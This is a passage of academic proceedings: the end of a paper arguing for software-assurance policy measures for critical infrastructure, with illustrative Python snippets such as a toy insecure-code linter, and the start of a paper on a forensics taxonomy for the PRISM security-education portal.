The government and major Integrated Development Environment (IDE) vendors should collaborate to create security test suites that identify common errors automatically, down to the compiler level. IDEs should check code much as W3C validation engines correct common HTML errors. This will help programmers improve without additional cost. Automated IDE test tools will transition legitimate developers and publishers to that new level of quality. With free tools for checking code, compliance becomes easier at all layers of development; the success of this approach is shown by the W3C and the rarity today of unreadable HTML pages. HTML code validation is now
trivial. Today most web code is generated by content management frameworks, so the workload has shifted from the individual developer to the tools.
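A toy sketch of such an automated check, scanning source lines for a few illustrative (far from exhaustive) patterns of the well-known errors discussed above:

```python
import re

# Illustrative patterns only; a real IDE checker would use deeper analysis
CHECKS = [
    (re.compile(r"password\s*=\s*['\"]\w+['\"]", re.I), "hard-coded credential"),
    (re.compile(r"SELECT .* \+ "), "SQL built by string concatenation"),
    (re.compile(r"\beval\s*\("), "eval on potentially untrusted input"),
]

def scan(source):
    """Return (line number, warning) pairs, in the spirit of an IDE validator."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for pattern, message in CHECKS:
            if pattern.search(line):
                findings.append((lineno, message))
    return findings

sample = 'db_password = "hunter2"\nq = "SELECT * FROM t WHERE id=" + uid\n'
for lineno, message in scan(sample):
    print(f"line {lineno}: {message}")
```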
3.3 Mitigation: Professionally license CCI software developers and publishers<br />
Many vital economic sectors in the physical world have accredited professionals to create a culture of quality and safety. Electricians, architects, and engineering professionals are certified and accredited to practise because the quality of their work affects public safety and infrastructure. However, unlike other CI professions, there is no legally recognized accreditation process for IT. Anyone can develop software without liability for the behaviour of that software. IT workers design, construct, and manage applications, databases, and network systems for all types of public-trust transactions, and they do all this without comparable professional support systems.
We can draw on the safety and security measures used in other professions as a model for software assurance. Like these conventional professions, the IT professions are responsible for major portions of the critical infrastructure in the cyber world. “[IT] practitioners can produce results as inconvenient or dangerous as any medical or legal mishap, without their having the amount of regulation or informed public scrutiny which both those areas command.” (Wilkes, 1997: 88) By leveraging the existing professional frameworks that support other CI professions such as accounting, engineering, and medicine, we can adopt policies and technologies that support improved public safety. Existing technology systems can create accountability for the software industry and transparency for its customers.
While academic training and apprenticeship still provide the basis for disseminating knowledge of good models and best practices, professional boards and licences should reinforce these practices with ethics. Certification and licensing options have the potential to legitimize IT as a profession by improving the quality of its output (Wilkes, 1997). These certifications still face implementation challenges: there are numerous standards and organization bodies in the software industry, but none of them has any enforcement capability, which makes adoption of any minimum standard extremely difficult. Key industry organizations such as the ACM and IEEE, which lead the professionalism of the industry, have only voluntary membership, which limits their effectiveness.
Any application that supports the CI should have certified developers and publishers licensed to code for CCI systems. With this differentiation, the consumer gets security accountability built into systems. The market will begin to demand the same levels of quality as in other industries, which will encourage software developers to distinguish themselves in the marketplace. This would also raise the barriers to entry in the software development market and ease the pressure on existing competitors able to adopt assurance practices, which will benefit both the software industry and the consumer.
4. Market risks preventing software quality and security and proposed mitigations<br />
The current highly competitive commercial software marketplace has neither the incentives nor the repercussions needed to implement standards. In many situations, security is an optional add-on, and a common business instruction to the developer is to ‘worry about security later’. No comparable response would be accepted if a mechanic reported that a vehicle was unsafe. There is a widespread lack of individual autonomy; IT workers feel that they cannot prioritize quality and safety ahead of production speed and ‘agility’ within their organization due to business pressures. With government-supported licensing, the individual practitioner would gain autonomy and legitimacy for security-driven efforts as a matter of compliance.
The customer is at a disadvantage in market knowledge. Consumers expect reasonable security measures, but there is no such assurance. Typically, the customer has to specify particular security measures in the contract; if security is not explicitly in the requirements, it is a burden on the development company to implement it. All estimates of the true cost of security in the system are wrong from the first unsecured prototype delivered to the client. The customer is left to learn about security by taking a risk-acceptance posture by default. By accepting unsecure software, customers incorrectly feed the market an acceptance signal. Without security forced to be “built in” to the process, the uninformed consumer does not know to discriminate between secure and non-secure technologies and to demand them accordingly, signalling for more supply.
The “industry knows best” approach to cyber-security is inefficient and a market failure (Assante, 2010). The public’s demand for cyber-security is higher than most firms’ individual demand, because the private costs resulting from a cyber-incident are often less than the public’s costs. For example, when electronically stored customer credit card information is stolen from a store, the financial institutions, not the store whose security was badly configured, are often responsible for the loss.
4.1 Vulnerability: Cyber incident data is inconsistent<br />
Most industries have no mandatory cyber incident reporting, which makes the true impact of cyber crime difficult to estimate. Regular studies performed by the FBI (CSI, 2009), the Secret Service, Verizon (Baker et al., 2010) and Microsoft (Microsoft SIR, 2010) all use voluntary surveys and data gathering. However, they differ on the change in malware rates. The FBI, Microsoft and Verizon security reports agree that malware attacks are on the rise, yet according to Microsoft’s SIR report, “Software vulnerabilities…have been on the decline since the second half of 2006,” progress the report ascribes to better development quality practices (Microsoft SIR, 2010). This disparity results from the vastly different data sets Microsoft and Verizon used; the voluntary nature of cyber incident reporting contributes to these differences. All three reports agree that the data is inconsistent due to the lack of a mandatory reporting system.
4.2 Mitigation: Mandate cyber incident reporting<br />
According to a Computer Security Institute survey, only a small fraction of organizations that experience a cyber attack report it to law enforcement (CSI, 2009). Firms generally do not favour expanded mandatory reporting because they do not want bad press or a negative public perception. The reluctance is even greater when the firm does not suffer any immediate financial loss. Reporting these intrusions (crimes) is in the greater interest of society, because authorities stand a better chance of stopping them if they have more information about the threat in general and can learn from emerging patterns.
To address privacy concerns, a reporting system similar to the U.S. Treasury FinCEN Suspicious Activity Report (SAR) could be used. Currently, most financial institutions are mandated to report certain types of suspicious activity using SARs. SARs are kept secret, have tight dissemination standards, and are an effective tool in fighting financial crime. A similar reporting system for cyber-attacks would be equally beneficial. “Disclosure laws” could force software publishers and their customers that support critical infrastructure to report cyber-attacks and data breaches to DHS (DHS NIAC, 2009). Mandated reporting will give a more accurate picture of cyber threats (Goertzel et al., 2007), help researchers identify weaknesses, and aid in the apprehension of attackers. The data collected will help inform actuarial tables for insurance firms and support the development of risk analyses. Cyber crime incident reporting should be required of all CI industries first, to gain better knowledge about the threat malware poses and to educate business owners and managers about the financial and legal implications of improper software assurance processes.
4.3 Vulnerability: Demand for cyber security<br />
Rational firms should use IT risk management to manage cyber security, but firms often lack the knowledge and expertise to implement it, and it is difficult for firms to measure the effectiveness of investments in cyber security (Mead, et al., 2009). This makes expenditures hard to justify and results in a general lack of investment in secure programming. The public is left with the costs of a cyber-security incident: the firms that were its target as well as their clients, the banks and others who feel its negative effects, and the taxpayers if the government responds. Since the overall damage of a cyber-incident is generally higher for the public, the public would rationally choose a higher investment in cyber-security. Unfortunately, the public has little say in what investment an individual firm decides to make, leading to underinvestment in the eyes of the public. In economic terms, the aggregate of private firms’ demand for cyber security is less than the public’s demand. This is a market failure, which invites regulation or some other form of market correction to rectify the externality.
Figure 2 illustrates a private firm’s efficient level of investment at q1, where the firm’s demand for security “D” equals the marginal cost “MC” of each additional unit of investment. The marginal social benefit is the public’s demand, which crosses the marginal cost line at q*. Here “q*” represents the
socially efficient level of cyber security, which is greater than the private level. The graph in Figure 2 shows that the public’s demand for security is greater than that of individual firms.
Figure 2: Demand vs. Investment in cyber security<br />
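The geometry of Figure 2 can be made concrete with a tiny numeric example (hypothetical linear curves, not taken from the paper): a private demand D(q), a higher marginal social benefit MSB(q), and a constant marginal cost MC.

```python
# Hypothetical linear curves: private demand, marginal social benefit,
# and a constant marginal cost per unit of security investment
def D(q):
    return 10 - q

def MSB(q):
    return 14 - q

MC = 4

# Private optimum q1: D(q1) = MC; social optimum q*: MSB(q*) = MC
q1 = next(q for q in range(15) if D(q) == MC)
qstar = next(q for q in range(15) if MSB(q) == MC)
print(q1, qstar, qstar - q1)  # 6 10 4 -> an underinvestment gap of 4 units
```

Because MSB lies above D, the social optimum q* exceeds the private optimum q1, which is exactly the underinvestment gap the text describes.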
4.4 Mitigation: Create information systems cyber security insurance market<br />
Data breaches usually carry no consequences or fines for the company that lost the customer data, and even fewer for the development team that wrote the software or configured the servers. A cyber security insurance market can create an economic incentive for firms to implement better security standards. To establish the market, governments would have to create laws placing partial liability for cyber attacks on software publishers and operating firms if they are negligent in failing to implement sufficient security standards and practices (Baer and Parkinson, 2007: 50-56).
With better cyber incident reporting, the research and insurance communities can find common risky behaviour patterns. Since private insurance companies use actuarial tables and measure risk, they would be able to establish scalable cyber security requirements. In exchange for coverage and premium discounts, insurance companies can require private firms to take reasonable steps to protect their systems within a risk management system. Premiums can assign a higher risk to IT security breaches stemming from programming errors and from failure to adopt best-practice standards in cyber security.
Market forces will generate an insurance market that accommodates firms of different sizes. A major difficulty in implementing this policy is ensuring that premiums are not too costly for firms to afford. As a result, it may be necessary for government to cap the damages that a firm may pay. The government can also help establish the cyber insurance market by facilitating reinsurance through indemnifying catastrophic losses.
4.5 Mitigation: Compliance with U.S. Federal IT acquisition security standards (fines)
Government IT acquisition and procurement decisions are unlike those of private corporations. In private concerns, shareholder value should ultimately control spending, so the implementation of security is driven by profit goals. The US Federal Government has complex goals of public good, accountability, fairness, and transparency. However, the majority of the CCI is located within the private sector, so to encourage effective standards the government has to rely on market forces and voluntary partnerships with industry (Golumbic, 2008).
Government and critical infrastructure (CI) systems are increasingly dependent on commercially developed software; in doing so they have transferred security risk upstream to the developers. As a result, the US government has created many of its own models for secure IT acquisition and procurement that impact system development processes. For example, the NIST Special Publication 800 series, the DOD standard DIACAP, and the Federal Information Security Management Act (FISMA) are all US regulations that deal
Mecealus Cronkrite et al.<br />
with security requirements for government information systems. Security rests with the acquisition<br />
policy and contract and the vendor management controls that they define, a non-standard approach.<br />
However, the GAO has found that the federal government overall has major deficiencies in information<br />
security, mainly due to the lack of technical acquisition expertise needed to interpret and apply security<br />
requirements to contracts, and the rigor and sustained effort required to keep validating vendor<br />
quality (GAO-09-661T, 2009). Therefore, by increasing the federal IT workforce and its capabilities, DHS<br />
NCCD can start to upgrade and improve the performance of security within the US government. Security<br />
requirements should be valued equally with e-government requirements in order to<br />
improve CI defence against disasters and attacks. Moreover, adding vendor non-compliance fines to the<br />
government IT acquisition process should increase the attention paid to CI systems.<br />
5. Conclusions and future work<br />
There is a growing relationship between preventable software assurance failures and exposed critical<br />
cyber infrastructure risk. Preventable software defects remain unresolved at the peril of all software<br />
consumers and endanger the cyber infrastructure on which we all rely. The software consumer is uninformed<br />
and cannot self-assure that the outsourced software they order meets an acceptable standard.<br />
Making the security case clear enough for the public to understand is harder than making the<br />
case to the developer and the business manager through market forces.<br />
The growing black market economy of malware exploits existing known defects in widely distributed<br />
commercial software. Targeting known common software defects is a primary vector for entering<br />
trusted networks and systems. Preventable programming errors make “zombie” slave computers accessories<br />
to organized crime. The growing criminalisation of cyber attacks is driving the need for<br />
new controls in the previously unregulated software development culture.<br />
Without support, businesses will tend to favour profits over safety; it is the nature of profit motivation.<br />
Firms on their own will not decide to invest the socially optimal amount in cyber security because<br />
it conflicts with their own rational decision-making criteria. Supported standards, however, enable<br />
the developer and publisher to mitigate preventable risk.<br />
Improving software assurance practices is one of the key countermeasures for protecting critical infrastructure.<br />
The industry needs to be motivated to encourage accountability and liability on behalf of<br />
the public good by avoiding common errors. This would also raise the barriers to entry in the software<br />
development market and ease the pressure on existing competitors who are able to adopt assurance<br />
practices, while legitimizing IT as a new profession entrusted with the public good of<br />
defending the critical cyber infrastructure.<br />
The proposed approaches examined a framework of increasing government and private controls on<br />
software quality and software assurance outcomes:<br />
- Mandate cyber incident reporting for CI industries, to increase transparency and research ability.<br />
- Enforce fines for federal IT security development non-compliance, to create better vendor compliance.<br />
- Create better IDE tools that check for common programming errors, to help prevent programmers from making common errors and increase the resilience of the software infrastructure.<br />
- Encourage professional licensing and non-repudiation for CCI developers and publishers, to help increase accountability and transparency in the publisher and developer community.<br />
The software industry will not be able to negotiate the safety standards process alone without some<br />
government assistance. There is a need for standards based software professional accreditation to<br />
ensure the consistent application of basic security programming techniques and data privacy. However,<br />
the industry should not wait for legislation. Software publishers have the ability to seize the momentum<br />
of media awareness and establish accountability for code security within their own organizations.<br />
Acknowledgements<br />
This work is an extended study of our final team project of IST623 (Introduction to Information Security),<br />
taught by Prof. Joon S. Park, in the School of Information Studies at Syracuse University in<br />
Spring 2010. We would like to thank the class for valuable feedback, insight, and encouragement as<br />
we researched and developed this project during the semester.<br />
The views expressed herein are those of the authors and do not necessarily reflect the views of, and<br />
should not be attributed to, the Department of Homeland Security or any of its agencies.<br />
References<br />
Assante, M.J. 2010, November 17. Testimony of Michael J. Assante, President and Chief Executive Officer National<br />
Board of Information Security Examiners of the United States Inc. Before the Senate Committee on<br />
Homeland Security and Governmental Affairs US Senate Hearing on Securing Critical Infrastructure in the<br />
Age of Stuxnet. Washington D.C.<br />
Baer, W.S. & Parkinson, A. 2007, "Cyberinsurance in IT Security Management,” IEEE Security & Privacy, vol. 5,<br />
no. 3, pp. 50-56.<br />
Baker, W., Goudie, M., Hutton, A., Hylender, C.D., Niemantsverdriet, J., Novak, C., Ostertag, D., Porter, C.,<br />
Rosen, M., Sartin, B. & Tippett, P., United States Secret Service 2010, July 28-last update, 2010 Data<br />
Breach Investigations Report [Homepage of Verizon], [Online]. Available:<br />
http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [2010, 10/20]<br />
Council of Europe Counterterrorism Task Force 2007, Cyberterrorism-the use of the internet for terrorist purposes.<br />
Council of Europe Publishing, Strasbourg Cedex, France<br />
CSI, “14th Annual 2009 CSI Computer Crime and Security Survey”, December 2009, Computer Security Institute.<br />
Falliere, N., Murchu, L.O. & Chien, E. 2010, October-last update, w32 Stuxnet Dossier [Homepage of Symantec],<br />
[Online]. Available:<br />
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dos<br />
sier.pdf [2010, 10/20]<br />
GAO May 5, 2009, GAO-09-661T: Testimony before the Subcommittee on Government Management, Organization,<br />
and Procurement; House Committee on Oversight and Government Reform: Cyber Threats and Vulnerabilities<br />
Place Federal Systems at Risk Statement of Gregory C. Wilshusen, Director, Information Security<br />
Issues, GAO, Washington, D.C.<br />
Gelbstein, E. & Kamal, A. 2002, Information insecurity: a survival guide to the uncharted territories of cyberthreats<br />
and cyber-security, 2nd ed, United Nations ICT Task Force and the United Nations Institute for<br />
Training and Research, New York, NY.<br />
Goertzel, K.M., Winograd, T., McKinley, H.L., Oh, L., Colon, M., McGibbon, T., Fedchak, E. & Vienneau, R. 2007,<br />
July 23-last update, Software Security Assurance State-of-the-Art Report (SOAR) [Homepage of Joint endeavour<br />
by IATAC with DACS], [Online]. Available: http://iac.dtic.mil/iatac/download/security.pdf [2010,<br />
10/20].<br />
Golumbic, M.C. 2008, Fighting terror online: the convergence of security, technology, and the law, Springer Verlag,<br />
New York.<br />
McGuinn, M. 2005, October 12-last update, Prioritizing Cyber Vulnerabilities, Final Report and Recommendations<br />
by the Council. [Homepage of DHS-NIAC], [Online]. Available:<br />
http://www.dhs.gov/xlibrary/assets/niac/NIAC_CyberVulnerabilitiesPaper_Feb05.pdf [2010, 10/20] .<br />
Mead, N.R., Allen, J.H., Conklin, A.W., Drommi, A., Harrison, J., Ingalsbe, J., Rainey, J. & Shoemaker, D. 2009,<br />
April-last update, Making the Business Case for Software Assurance [Homepage of Carnegie Mellon Software<br />
Engineering Institute], [Online]. Available: http://www.sei.cmu.edu/reports/09sr001.pdf [2010, 10/20].<br />
Microsoft, “Microsoft Security Intelligence Report Volume 9 (Jan 1 2010 - Jun 30 2010)”, 2010, [Homepage of Microsoft],<br />
[Online]. Available: http://www.microsoft.com/security/sir/default.aspx [2010, 10/20].<br />
McGurk, S. 2010, November 17, Statement for the Record of Seán P. McGurk, Acting Director, National Cybersecurity<br />
and Communications Integration Center, Office of Cybersecurity and Communications, National Protection<br />
and Programs Directorate, Department of Homeland Security, Before the United States Senate<br />
Homeland Security and Governmental Affairs Committee, Washington, DC.<br />
MITRE & SANS 2010, April 5-last update, CWE/SANS Top 25 Most Dangerous Programming Errors [Homepage<br />
of MITRE], [Online]. Available: http://cwe.mitre.org/top25/ [2010, 10/20].<br />
NIAC, National Infrastructure Advisory Council September 8, 2009, Critical Infrastructure Resilience Final Report<br />
And Recommendations, DHS, Washington, D.C.<br />
OECD, 2008, “Malicious Software (Malware): A Security Threat to the Internet Economy”, OECD, Seoul, Korea.<br />
US-CERT, “Build Security In. (n.d.).Key Practices for Mitigating the Most Egregious Exploitable Software Weaknesses.<br />
Software Assurance Pocket Guide Series: Development” Volume II Version 1.3.2009, May 24-last<br />
update [Homepage of DHS-US-CERT], [Online]. Available: https://buildsecurityin.uscert.gov/swa/downloads/KeyPracticesMWV13_02AM091111.pdf<br />
[2010, 10/20].<br />
US-CERT Multi-State Information Sharing and Analysis Center and United States Computer Emergency Readiness<br />
Team (US-CERT) 2005, May 16-last update, Malware Threats and Mitigation Strategies [Homepage of<br />
DHS-US-CERT], [Online]. Available: http://www.us-cert.gov/reading_room/malware-threats-mitigation.pdf<br />
[2010, 10/20]<br />
Wang, Y., Zheng, B. & Huang, H. 2008, "Complying with Coding Standards or Retaining Programming Style: A<br />
Quality Outlook at Source Code Level", Journal of Software Engineering and Applications, vol. 1, no. 1, pp.<br />
88.<br />
Wilkes, J. 1997, "Business Ethics: A European Review, Focus: 'Protecting the Public, Securing the Profession:'<br />
Enforcing Ethical Standards among Software Engineers"<br />
Building an Improved Taxonomy for IA Education<br />
Resources in PRISM<br />
Vincent Garramone and Daniel Likarish<br />
Regis University, Denver, USA<br />
garra909@regis.edu<br />
dlikaris@regis.edu<br />
Abstract: To address a perceived lack of availability of educational resources for students and educators in the<br />
field of information assurance, Regis University and the United States Air Force Academy (USAFA) have begun<br />
development of a web portal to store and make available to the public information security-related educational<br />
materials. The portal is named the Public Repository for Information Security Materials (PRISM). In this paper, we<br />
begin with a review of the initial vision for PRISM. We then discuss the development and maintenance of a<br />
deterministic discipline-specific vocabulary, along with the results of mapping curricular content to our initial set of<br />
terms. Out of the eight material descriptions used in our evaluation, four could be clearly mapped to the initial<br />
vocabulary, one could be partially mapped, and three did not contain any clearly mappable terms.<br />
Keywords: PRISM, security education, taxonomy, educational resources<br />
1. Introduction<br />
As our lives become increasingly dependent on information technology, educating those who<br />
develop and manage those technologies about information assurance (IA) concepts is crucial to help<br />
reduce the risks of our information being lost, stolen or otherwise compromised. Recent attendance at<br />
national conferences for educators (e.g. ISECON (Information Systems Education Conference),<br />
CISSE (Colloquium for Information Systems Security Education) and AMCIS (Americas Conference<br />
on Information Systems)) provided an opportunity to determine the need for security courses and<br />
materials to support them. The organization and promotion of Security Special Interest Groups<br />
(SecSIG) and the increase in the number and variety of security education papers also demonstrate the<br />
increased interest in the field, and the trend has culminated in national recognition that security<br />
education is a national and international concern (Cooper et al 2010).<br />
Unfortunately, aligning existing educational programs to include a focus on security topics has proven<br />
not to be straightforward. For example, although some institutions report success adding security-specific<br />
courses to existing curricula, others find this infeasible because of the significant instruction<br />
time and expertise required (Null 2004). As an alternative to adding a security-specific course,<br />
relevant lessons can be integrated into existing courses to teach security concepts (Irvine, Chin, and<br />
Frincke 1998). Instructors wishing to add lessons to existing courses must either create or locate<br />
materials that meet their particular curricular needs. Similar to creating and integrating entire courses,<br />
some instructors may not have the time or expertise to develop effective lessons for every topic they<br />
wish to teach. They also recognize the non-uniqueness of lesson materials and see limited utility in<br />
reinventing materials that they suspect others have already developed (Davis 2010).<br />
To help address these issues and advance the availability of information security education materials,<br />
Regis University and USAFA have initiated a collaborative effort to develop a web portal to store and<br />
make available to the general public information security related educational materials, research,<br />
virtual exercises, and links to security resources. The PRISM web portal will provide an online virtual<br />
space for educators to discuss effective pedagogy, share tools, and collaborate on curriculum<br />
development.<br />
This paper reviews the current vision for the PRISM repository and discusses the development of a<br />
deterministic, taxonomy-based method of organizing content. The use of deterministic portal-site<br />
analytics is proposed to further improve the forensics content taxonomy and the load process.<br />
2. Vision<br />
The creators of the Public Repository for Information Security Materials (PRISM) web portal intend to<br />
make it a resource for students and educators who are interested in information security education.<br />
Visualization tools, publications, educational materials, links to relevant websites, and research data<br />
are all potential types of material. We envision that individuals, educators and students from K-Collegiate<br />
will contribute to the materials on the site in an ad hoc fashion. The site is a civic commons<br />
portal that relies on the goodwill of participants to contribute content. Future versions of the site will<br />
use publication (e.g. blogs, podcasts, articles) to encourage participants to return to the site for<br />
reasons beyond the teaching materials. In addition, the site has the potential to serve as a<br />
collaborative workspace for discussing tools and teaching methods in both synchronous and<br />
asynchronous modes, and for participating in educational games and online activities.<br />
Part of this effort involves determining the most useful way to classify and organize resources<br />
available on the site. Information security is a broad and complex field of study, and one can quickly<br />
become mired in results irrelevant to their interests when conducting keyword searches. Moreover, it<br />
may be difficult to identify terms that will be most useful in locating specific materials within any given<br />
repository (Dicheva and Dichev 2006), especially since many repositories tend to use very general<br />
metadata definitions that lack the specificity required to effectively locate resources (Moisey 2006).<br />
We anticipate an improved method for locating relevant material with carefully crafted taxonomies,<br />
constructed by analyzing vocabulary usage in curricular literature and actual site searches.<br />
3. Background<br />
In early 2010, PRISM became available to the public. For a complete treatment of the initial vision,<br />
requirements, and technical execution, see (Garramone and Schweitzer 2010). The web portal was<br />
designed with a high degree of flexibility to allow the project to mold itself to the changing needs of the<br />
community. Ease of use for content seekers and developers, as well as for site moderators and<br />
administrators, was given priority when selecting the hardware and software components of PRISM.<br />
An initial set of seven publications and eleven interactive lessons was provided by Dr. Schweitzer and<br />
the US Air Force Academy to showcase the types of resources PRISM was designed to contain. A<br />
handful of materials from other sources were also posted to demonstrate potential content types such<br />
as hyperlink resources and educational simulations. Resources were categorized using a custom set<br />
of vocabularies designed to allow users from heterogeneous backgrounds to access the materials<br />
using familiar terms.<br />
In particular, a subset of the Dublin Core (Weibel et al 2008) provided standard metadata.<br />
Additionally, vocabularies from two prominent IA common bodies of knowledge (CBK) (Theoharidou<br />
and Gritzalis 2007) were implemented to organize resources according to their IA topical content.<br />
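As an illustration of this tagging scheme, the record below sketches how a single PRISM resource might combine a Dublin Core subset with CBK topic terms. The field names and values are our own hypothetical example, not the portal's actual schema.

```python
# Hypothetical metadata record for one PRISM resource.
# Field choices are illustrative; PRISM's real schema may differ.
resource = {
    # Dublin Core subset (standard metadata)
    "dc:title": "Introduction to Steganography Lab",
    "dc:creator": "Example Author",
    "dc:date": "2010-01-15",
    "dc:type": "InteractiveResource",
    # IA common-body-of-knowledge topical tags
    "cbk:topics": ["Steganography", "Hidden Data Discovery"],
}

# A guided search can then filter resources by topic tag.
print(resource["dc:title"])
```

Separating the standard bibliographic fields from the topical CBK tags is what lets the same resource be reached both by keyword and by guided topic browsing.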
Although PRISM is a fully functional repository, several challenges remain. Organizing content based<br />
on static metadata sets proves difficult as usage patterns and industry terminology change.<br />
Furthermore, complex tagging requirements make it difficult for developers to contribute<br />
their content. In a recent IEEE Transactions on Learning Technologies article, Davis et al. (2010) describe the<br />
more general sharing and deposition of education materials by small colleges and universities in<br />
common repositories. The failure to develop sustainable material repositories results from poor<br />
design decisions and weak user motivation; failure of adoption by communities is related to<br />
difficulty of use, administration, and currency of materials.<br />
4. Dynamic taxonomy based content management<br />
Previous attempts to establish education web portals have been less than successful, owing to a lack of<br />
participation by resource developers and cumbersome site search strategies for locating interesting<br />
course materials. Uploading resources requires developers to provide metadata descriptors of<br />
their materials based on a fixed taxonomy. Because of the wide variance in resource content, static<br />
taxonomies based on generic structures inherited through the parent portal developer’s best efforts<br />
are not effective. From the resource downloader’s perspective, attempts to retrieve materials are<br />
discouraging because of the difficulty of searching for materials described by the same limited taxonomy.<br />
For example, in the Merlot educational material repository, the most granular taxonomic term for<br />
information assurance materials is “Security” under the “Information Technology” heading. This<br />
provides no terminology guidance for those submitting or searching for content, and forces users to<br />
resort to keyword searches.<br />
We used the PRISM portal to investigate a simple, deterministic approach to creating a flexible and<br />
stable taxonomic structure that would allow forensics educators to upload resources and search<br />
content in an easier and more useful way. Our approach consisted of generating an initial list of<br />
forensics descriptors that were manually extracted from current forensics literature and ranked<br />
according to the percentage of documents in which each term appeared. The content of a computer<br />
forensics course was used to evaluate whether the literature based taxonomy approach would<br />
produce an acceptable description of the material. The result of the evaluation confirmed that a<br />
literature based seeded taxonomy was a good starting point, but that refinement is necessary. The<br />
digital forensics topic was chosen as our initial case because Regis University wanted to make lab<br />
materials from its computer forensics course available on the PRISM site and felt these materials<br />
would be representative of content for a graduate forensics class. The weekly lab materials were<br />
qualitatively evaluated using the list of forensics terms derived from current forensics literature. These<br />
results were then compared to actual terms in the lab topic descriptions given in the course syllabus.<br />
4.1 Granularizing PRISM taxonomies<br />
One of the major goals of PRISM is to make searching for content intuitive and efficient. To achieve<br />
this, content must be tagged in a way that allows keyword and guided searches to return accurate<br />
results. Since IA terminology varies widely among researchers and practitioners, we have tried to<br />
accommodate the broadest possible group of users by developing several taxonomies to tag content.<br />
After a resource has been associated with a particular taxonomy term, it can automatically be<br />
included in guided searches and is reachable with the advanced search function of PRISM. At the<br />
conclusion of the first major development phase, PRISM was equipped with both the International<br />
Information Systems Security Certification Consortium (Theoharidou and Gritzalis 2007) and U.S.<br />
Department of Homeland Security CBK vocabularies (Shoemaker, Drommi, Ingalsbe and Mead<br />
2007). However, in simple use cases existing vocabularies did not offer a sufficient level of specificity.<br />
Rather than create arbitrary lists of terms a researcher might personally want to search for, it was<br />
decided to review the literature and attempt to distill vocabularies that would reflect common usage<br />
among curriculum developers.<br />
The first effort to granularize the PRISM taxonomies was in the area of digital forensics. Digital<br />
forensics is its own discipline within the realm of information security (Berghel 2003). On this basis,<br />
forensics is considered an ideal candidate for a descriptive taxonomy within PRISM. PRISM<br />
researchers analyzed nine recent publications, primarily from curriculum developers, to identify a<br />
common taxonomic structure and current terminology usage. These publications were selected for<br />
their recent contribution and, based on the level of repetition of terms observed, were considered<br />
adequate in number and scope to generate an initial forensics vocabulary for PRISM. The digital<br />
forensics vocabulary currently being used in PRISM contains the most commonly observed digital<br />
forensics terms from these nine papers, and will explicitly specify relationships between synonyms as<br />
they are identified through site analytics. Table 1 shows the initial list of terms implemented within<br />
PRISM (See Appendix 1 for the complete table). To keep the list to a manageable size, only terms<br />
referenced in at least one third of the papers analyzed were included in this initial vocabulary.<br />
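The selection rule described above (count how many of the nine analysed papers reference each candidate term, then keep only terms cited by at least one third of them, ranked by reference count) can be sketched as follows. The function name and the sample data are illustrative assumptions, not the actual extraction tooling.

```python
def build_vocabulary(term_mentions, num_papers, min_fraction=1/3):
    """term_mentions maps each candidate term to the set of paper IDs citing it.

    Keep terms referenced in at least min_fraction of the papers,
    ranked by reference count (ties broken alphabetically).
    """
    threshold = num_papers * min_fraction
    counts = {term: len(papers) for term, papers in term_mentions.items()}
    kept = {t: c for t, c in counts.items() if c >= threshold}
    return sorted(kept.items(), key=lambda tc: (-tc[1], tc[0]))

# Illustrative subset of the terminology usage data from Appendix 1.
mentions = {
    "Legal Process": {1, 3, 5, 6, 11, 12},
    "Steganography": {1, 5, 11, 12, 13},
    "Packet Analysis": {3, 13},  # below the one-third cut-off, so dropped
}
print(build_vocabulary(mentions, num_papers=9))
# [('Legal Process', 6), ('Steganography', 5)]
```

With nine papers the threshold is three references, which is why "Packet Analysis" (mentioned above as identified in the literature but excluded) does not survive the cut.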
Table 1: PRISM’s initial digital forensics vocabulary<br />
Forensics Topics | Reference Count<br />
Legal Process | 6<br />
Log Analysis | 6<br />
Data Acquisition | 5<br />
Data Decryption | 5<br />
Deleted Data Recovery | 5<br />
Email Forensics | 5<br />
Hidden Data Discovery | 5<br />
Steganography | 5<br />
Documentation | 4<br />
Ethics | 4<br />
Network Forensics | 4<br />
Incident Response | 3<br />
Live System Forensics | 3<br />
Malware Detection | 3<br />
Password Cracking | 3<br />
Registry Analysis | 3<br />
To avoid creating too much predefined structure and possibly over-restricting the way users interact<br />
with the site, a single, flat vocabulary of forensics-related terms was defined, as opposed to a<br />
hierarchical one. This accommodates variance in how users define and use<br />
terms. Furthermore, terms that refer to conceptual subsets of other terms are included in the<br />
vocabulary because they are often used independently of their parent terms in the<br />
literature. For example, “Steganography” could be conceptually categorized as “hidden data<br />
discovery”, but more than half of the papers examined explicitly mentioned the former term. This is an<br />
example of a deterministic approach: allowing actual usage of terms to dictate taxonomy<br />
development.<br />
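A minimal sketch of this design choice, assuming a simple in-memory representation: the vocabulary itself stays flat, while synonym or subset relationships are recorded separately so that a search can expand a term without imposing a hierarchy. The structures below are our illustration, not PRISM's actual data model.

```python
# Flat vocabulary: every term is a peer, with no parent/child nesting.
FORENSICS_VOCABULARY = {"Hidden Data Discovery", "Steganography", "Network Forensics"}

# Conceptual relationships are kept in a separate map, so the vocabulary
# stays flat while searches can still expand a term to related terms.
RELATED_TERMS = {
    "Steganography": {"Hidden Data Discovery"},  # conceptual subset, per the text
}

def expand_query(term):
    """Return the search term plus any explicitly related terms."""
    return {term} | RELATED_TERMS.get(term, set())

print(sorted(expand_query("Steganography")))
# ['Hidden Data Discovery', 'Steganography']
```

Because the relationship lives outside the vocabulary, a user who tags material only with "Steganography" can still be found by someone searching the broader "Hidden Data Discovery".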
4.2 Dealing with added complexity<br />
As the taxonomy structure becomes more complex, a tradeoff between the ease of content searching<br />
and the difficulty of content submission is made. To offset the effects of PRISM’s more complex<br />
taxonomy system, PRISM moderators will categorize content for developers. This service reduces<br />
submission difficulty, requiring only that a link be submitted or an archive uploaded for content<br />
to be posted.<br />
4.3 A trial of the system<br />
We used Regis University’s Computer Forensics course to evaluate the list of terms derived from the<br />
literature (Table 1) and their ability to describe the computer forensics materials. The premise of the<br />
course is to introduce the student to a wide variety of methods for investigating computer security<br />
incidents. Each student takes on the role of a forensic analyst and each week the student is asked to<br />
apply their skills to the analysis of many different types of data with different scenarios and tools. The<br />
students have to create log entries detailing their findings as they work through the process of<br />
analyzing the data for each scenario. First, we chose terms from the vocabulary that we felt<br />
represented the lab content and learning intent. These lists, given in Table 2, column 2, represent the<br />
values a content creator would assign to their own materials upon upload to the PRISM site. Next<br />
those terms were compared with actual language used to describe the lab content in the course<br />
